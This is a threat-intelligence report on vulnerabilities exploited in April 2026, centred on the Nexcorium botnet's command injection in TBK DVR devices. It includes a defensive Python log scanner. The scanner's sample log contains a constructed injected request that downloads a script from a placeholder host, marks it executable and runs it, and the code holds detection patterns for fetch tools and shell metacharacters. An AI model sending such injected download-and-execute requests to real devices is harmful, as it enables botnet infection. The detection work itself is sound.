In April 2026, Insikt Group® identified 37 critical vulnerabilities requiring urgent remediation. Of these, 35 were assigned a Very Critical Recorded Future Risk Score, a 19% increase over the previous month.
Among these vulnerabilities, 31 were included in the US Cybersecurity and Infrastructure Security Agency (CISA)’s Known Exploited Vulnerabilities (KEV) catalog, while six were identified solely through honeypot data, available only to Recorded Future clients.
The vulnerabilities impacted products from 23 different vendors, with Microsoft representing roughly 22% of the exposure. The remaining vulnerabilities were primarily found in enterprise-focused vendors, spanning security management tools, collaboration platforms, development software, and network infrastructure.
In response to newly identified risks, Insikt Group has developed Nuclei templates specifically for authentication vulnerabilities in Nginx UI (CVE-2026-33032) and Marimo (CVE-2026-39987), accessible solely to Recorded Future customers.
April 2026 Vulnerability Snapshot
The 31 vulnerabilities listed below were actively exploited throughout April 2026; the six tied to honeypot data are not included in the table. Examples of public proof-of-concept (PoC) exploits identified by Insikt Group® are included, although they have not been verified for effectiveness. Vulnerability management teams should treat these PoCs with caution.
Table omitted in this extract; its columns included a Score field and a ✓ marker (available to Recorded Future Customers).
Table 1: This table outlines vulnerabilities that were actively exploited in April, utilizing Recorded Future data (excluding honeypot-sourced CVEs).
Trends and Observations: April 2026
- Seven out of the identified vulnerabilities were connected to ransomware. Six specifically related to the Medusa ransomware operations run by Storm-1175.
- CISA linked CVE-2026-41940 to ransomware activity associated with a group known as Sorry Ransomware.
- Attackers also exploited CVE-2024-3721 in TBK DVR devices, enabling deployment of the Nexcorium botnet.
- Remote code execution (RCE) was enabled by 16 of the vulnerabilities, impacting products from various vendors including Adobe, Microsoft, and Fortinet.
- Of the 37 vulnerabilities, public PoC exploits were identified for 24, with common flaws being CWE-22 (Path Traversal) and CWE-94 (Code Injection).
- Notably, three vulnerabilities were at least five years old, with the oldest dating back approximately 17 years, underscoring the persistence of legacy vulnerabilities in unpatched environments.
- The duration from public disclosure to exploitation was alarmingly short, observed at just two days in some cases.
Focused Exploitation Analysis
This section highlights some of the most impactful, actively exploited vulnerabilities linked to recognized threat campaigns. These were chosen due to their public PoC availability or the existence of Nuclei templates for detection created by Insikt Group®.
Nexcorium Campaign Targets TBK DVR Vulnerability (CVE-2024-3721)
On April 17, 2026, FortiGuard Labs (@FortiGuardLabs on X, previously Twitter) released a technical analysis correlating a campaign with Nexcorium, a Mirai-derived botnet, that exploits TBK DVR devices via CVE-2024-3721. This OS command injection vulnerability can be exploited remotely to execute arbitrary system commands without authorization.
FortiGuard Labs showed that the campaign exploits CVE-2024-3721 through crafted requests that manipulate specific arguments sent to TBK DVRs, leading to the download of a script named dvr, which in turn retrieves and executes Nexcorium binaries. The script sets the binaries' permissions to 777 and executes them with arguments that identify the compromised system.
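The request-driven chain described above (command injection in a request argument, followed by a download, chmod 777 and execution of a dropper) leaves a recognisable footprint in device or reverse-proxy access logs. The detector below is an added example for defenders and is not code from Recorded Future, Insikt Group or FortiGuard Labs. The log lines, the /cgi-bin/status path, the device= parameter and the 198.51.100.5 host are constructed placeholders, not the actual TBK DVR endpoint or any indicator from the page; the logic flags any query parameter carrying shell metacharacters or a download-then-execute chain, so it generalises beyond this one CVE to command injection attempts in general.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample access-log lines (placeholders, not telemetry from the report).
# Line 2 models the dropper chain the page describes; line 4 models a probe.
SAMPLE_LOG = """\
203.0.113.10 - - [17/Apr/2026:10:01:02 +0000] "GET /cgi-bin/status?device=cam01 HTTP/1.1" 200 512
203.0.113.11 - - [17/Apr/2026:10:01:05 +0000] "GET /cgi-bin/status?device=cam01;wget%20http://198.51.100.5/dvr%20-O%20/tmp/dvr;chmod%20777%20/tmp/dvr;sh%20/tmp/dvr HTTP/1.1" 200 12
203.0.113.12 - - [17/Apr/2026:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 2048
203.0.113.13 - - [17/Apr/2026:10:03:00 +0000] "GET /cgi-bin/status?device=$(id) HTTP/1.1" 200 12
"""

# Common Log Format: client, identity, user, [timestamp], "METHOD target PROTO", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" (?P<status>\d+) (?P<size>\d+)'
)

# Shell separators and command substitution that never belong in an identifier-style parameter.
METACHAR_RE = re.compile(r'[;|&`]|\$\(|\$\{|\n')

# Fetch tool followed (anywhere later in the same value) by chmod 777 or chmod +x:
# the download-then-execute pattern typical of Mirai-derived droppers.
DROPPER_RE = re.compile(r'\b(wget|curl|tftp)\b.*\bchmod\s+(777|\+x)\b', re.S)


def analyze_target(target):
    """Return finding labels for one request target (path plus query string)."""
    findings = []
    query = urlsplit(target).query
    if not query:
        return findings
    # Split on '&' only; parse_qs changed its ';' handling across Python versions,
    # and a ';' inside a value is exactly what we want to inspect, not split on.
    for pair in query.split('&'):
        name, _, raw = pair.partition('=')
        value = unquote_plus(raw)  # decode %20 etc. before pattern matching
        if METACHAR_RE.search(value):
            findings.append(f"shell-metachar:{name}")
        if DROPPER_RE.search(value):
            findings.append(f"dropper-chain:{name}")
    return findings


def scan_log(text):
    """Parse access-log text and return one hit record per suspicious request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        findings = analyze_target(m['target'])
        if findings:
            hits.append({
                'ip': m['ip'],
                'ts': m['ts'],
                'target': m['target'],
                'findings': findings,
            })
    return hits


if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        print(hit['ts'], hit['ip'], ', '.join(hit['findings']))
```

Two findings fire on the constructed dropper line (shell-metachar and dropper-chain, both on the device parameter) and one on the probe line. In practice the `dropper-chain` label is the higher-confidence alert, since a lone metacharacter can appear in legitimate traffic on some devices; correlating a hit with an outbound connection from the DVR to the host named in the request, and with a new world-writable file under /tmp, confirms the chain the analysis describes.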
For additional technical insights and indicators of compromise, Recorded Future customers can refer to Insikt Group's reporting, which also includes access to Malware Intelligence queries, surfacing samples connected to known network indicators.